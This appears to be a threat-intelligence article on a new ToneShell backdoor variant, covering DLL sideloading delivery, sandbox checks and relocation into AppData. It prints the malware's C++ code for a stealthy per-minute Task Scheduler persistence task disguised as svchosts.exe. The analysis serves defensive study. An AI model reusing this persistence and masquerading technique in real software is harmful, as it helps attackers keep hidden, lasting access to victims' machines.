Since its first appearance earlier this year, the ToneShell backdoor has demonstrated a remarkable capacity for adaptation, toyed with by the Mustang Panda group to maintain an enduring foothold in targeted environments.
This latest variant, discovered in early September, arrives concealed within sideloaded DLLs alongside legitimate executables.
Delivered via compressed archives purporting to contain innocuous documents, the backdoor activates when the host process triggers the malicious DLL, initiating a carefully orchestrated infection routine that evades cursory inspection.
In its typical deployment, the archive—often named with localized or politically themed titles—contains the legitimate loader executable and a renamed DLL payload.
Upon execution, the DLL probes its environment for sandbox artifacts, including process names and file paths associated with security solutions, before proceeding.
If these checks pass, the malware copies itself to a newly created subfolder under the user’s AppData directory, alongside several Microsoft Visual C++ runtime libraries.
Intezer analysts noted that this sequence ensures the backdoor runs from a location less likely to attract scrutiny, blending into the normal user profile structure.
Once relocated, the backdoor establishes persistence by interacting directly with Windows’ Task Scheduler COM service.
Intezer researchers identified that the malware leverages the ITaskService and IRegisteredTask interfaces to create a scheduled task named “dokanctl” in the root folder.
This task is configured to launch the malicious executable every minute, ensuring near-continuous reinfection even if the process is terminated.
The task definition sets the action path to the copied svchosts.exe within AppData, effectively masquerading as a legitimate Windows process.
The impact of this innovation is far-reaching. By abusing the Task Scheduler COM service rather than relying on registry run keys or service installation, the backdoor avoids well-known detection heuristics.
Moreover, since the scheduled task leverages existing system libraries, security tools without deep behavioral analysis may overlook the modification.
Persistence Mechanism via Task Scheduler COM Service
ToneShell’s persistence mechanism hinges on a few lines of custom code that instantiate and interact with COM interfaces.
After CoInitializeEx succeeds, the malware calls:-
CComPtr<ITaskService> taskService;
HRESULT hr = taskService.CoCreateInstance(__uuidof(TaskScheduler));
if (SUCCEEDED(hr)) {
taskService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
CComPtr<ITaskFolder> rootFolder;
taskService->GetFolder(_bstr_t(L"\\"), &rootFolder);
CComPtr<IRegisteredTask> existingTask;
rootFolder->GetTask(_bstr_t(L"dokanctl"), &existingTask);
if (!existingTask) {
CComPtr<ITaskDefinition> taskDef;
taskService->NewTask(0, &taskDef);
CComPtr<ITriggerCollection> triggers;
taskDef->get_Triggers(&triggers);
CComPtr<ITrigger> trigger;
triggers->Create(TASK_TRIGGER_TIME, &trigger);
// configure trigger for every minute
CComPtr<IActionCollection> actions;
taskDef->get_Actions(&actions);
CComPtr<IAction> action;
actions->Create(TASK_ACTION_EXEC, &action);
CComPtr<IExecAction> exec;
action->QueryInterface(&exec);
exec->put_Path(_bstr_t(L"%APPDATA%\\svchosts.exe"));
rootFolder->RegisterTaskDefinition(_bstr_t(L"dokanctl"), taskDef,
TASK_CREATE_OR_UPDATE, _variant_t(), _variant_t(),
TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(), nullptr);
}
}This approach demonstrates a nuanced understanding of Windows internals, allowing the backdoor to persist with minimal footprint.
The reliance on COM interfaces also sidesteps simple file-based detection, as the actual executable is invoked through the scheduler rather than directly executed on startup.
As organizations shore up defenses against ToneShell, monitoring for anomalous COM-based Task Scheduler interactions will become increasingly crucial.
